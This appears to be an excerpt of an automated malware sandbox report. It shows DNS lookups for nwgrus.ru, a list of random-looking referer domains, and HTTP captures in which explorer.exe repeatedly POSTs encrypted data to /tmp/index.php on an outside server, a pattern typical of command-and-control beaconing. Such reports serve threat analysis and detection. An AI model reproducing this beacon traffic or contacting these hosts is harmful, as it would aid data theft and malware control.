Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	180.75.11.133	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	179.52.87.163	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	95.86.30.3	A (IP address)	IN (0x0001)	false
Oct 1, 2024 15:19:55.287265062 CEST	1.1.1.1	192.168.2.4	0x8010	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bhqjnnqelycixny.net

nwgrus.ru

puyhtqcmdpxpluct.net

wcdxuymrcevjnpq.org

furydiibsxgmyj.com

riurefweuxr.org

yduxerbrsufspya.com

ysuvstjxegoleu.org

ppentvmtanft.com

iyujkbbljdajhtr.net

awdlidomwbvuuhth.com

nrwpjmrfkgs.org

ikextycmggavxa.org

xflbmtqhirja.com

pyqfoqocstl.com

dijxohecsahmqya.net

fkwktqlntyvhlhv.net

axuolhuhwntg.org

obobrllwrvxobu.net

flkhebcbosbhs.org

sdipfhxrqta.net

ecqgmfmehrdfesh.net

cmyvyfvgexcutc.org

gahrsvlvghgft.com

dikpavspdxtej.net

arbcgjbfbud.net

dhkilweanmi.com

rvuyclbvwkrg.com

jqtjcxypgpwnw.net

bcgwrufdvmvybh.com

whtwvxqhovvmi.org

dyfmjstgfwohx.net

kwsghrqhqvcg.org

ccplyqsjscjfnfid.org

lqtuaptcsfhre.org

dfuclvkubxc.com

utvluvviohegxwa.org

gciivaguamcfaiv.net

pdfnugwkpxwacgj.org

dxlshxkdsvnwfeb.org

snihbsmchoau.org

saahpawkqkmb.com

nuocycmfgie.org

vjpuynmuynejyil.com

sbfilscmpife.com

nylkqgrfrnt.org

gnxmthbmvqq.org

yvujkdpmsqqrh.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:22.451747894 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bhqjnnqelycixny.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 216 Host: nwgrus.ru
Oct 1, 2024 15:17:22.451772928 CEST	216	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 51 b2 99 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA .[k,vu QPq\|_\v"Q.~pHe:}0VXa-hx%4+0h VwIUE@
Oct 1, 2024 15:17:23.620310068 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 e9 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:23.632148027 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://puyhtqcmdpxpluct.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: nwgrus.ru
Oct 1, 2024 15:17:23.632172108 CEST	345	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 4e 0d a8 84 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuN!`{}6H/?%5plF0}#<2XJV`6,{we,:s5W6j\U021u`F\|BZWAb
Oct 1, 2024 15:17:24.751142979 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:24.764417887 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wcdxuymrcevjnpq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: nwgrus.ru
Oct 1, 2024 15:17:24.764436007 CEST	348	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5a 38 ea ba Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuZ8nSyav`j$H}?{#pCu$P (!RE?v[S5v%x8V5lARV7l!/nazFushL:6k
Oct 1, 2024 15:17:25.914532900 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:25.922745943 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://furydiibsxgmyj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: nwgrus.ru
Oct 1, 2024 15:17:25.922774076 CEST	150	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4c 42 d5 e7 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuLB\\|tT-L,zS\|Ti[YR;-bg8#!cw.v
Oct 1, 2024 15:17:27.029357910 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:26 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:27.037231922 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://riurefweuxr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: nwgrus.ru
Oct 1, 2024 15:17:27.037246943 CEST	148	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7e 3e b1 ad Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu~>oT^Nt6D\|@q=,[SGP%.3v]ATOh
Oct 1, 2024 15:17:28.205945015 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:28.214375019 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yduxerbrsufspya.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 277 Host: nwgrus.ru
Oct 1, 2024 15:17:28.214417934 CEST	277	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 63 46 df fe Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vucFl%iBS'W7&-igLkO#_N Qq}, g{>FK]TB**J&7%Ck34\jV&iY$
Oct 1, 2024 15:17:29.341069937 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:29 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:29.350001097 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ysuvstjxegoleu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 170 Host: nwgrus.ru
Oct 1, 2024 15:17:29.350030899 CEST	170	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 23 29 e5 b8 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu#)VBV{elCj<zt.`b;S2MQO[JN/?lwg;Ps]d
Oct 1, 2024 15:17:30.500327110 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:30 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:30.508013010 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ppentvmtanft.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: nwgrus.ru
Oct 1, 2024 15:17:30.508030891 CEST	126	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 66 5e d6 e3 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuf^_nbRMonw
Oct 1, 2024 15:17:31.641361952 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:31.786107063 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iyujkbbljdajhtr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: nwgrus.ru
Oct 1, 2024 15:17:31.786122084 CEST	326	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 43 55 bd 82 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuCUHVdygu-os/x$S;<*J+[Qs9Q?ir_-x\|)=>:C2~@{l>wx{V?a
Oct 1, 2024 15:17:33.261308908 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 1, 2024 15:17:33.261368990 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:33.269844055 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://awdlidomwbvuuhth.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 196 Host: nwgrus.ru
Oct 1, 2024 15:17:33.269926071 CEST	196	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 77 47 af ae Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuwGV_`g2EywiErB] 0e(6$&zO{&#=4NJ8J
Oct 1, 2024 15:17:34.418441057 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:34 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:34.427390099 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nrwpjmrfkgs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: nwgrus.ru
Oct 1, 2024 15:17:34.427407026 CEST	205	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2f 2c da e8 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu/,4mFuc8,A/i@SHGV!Ti)\1LC.t(/khR\2
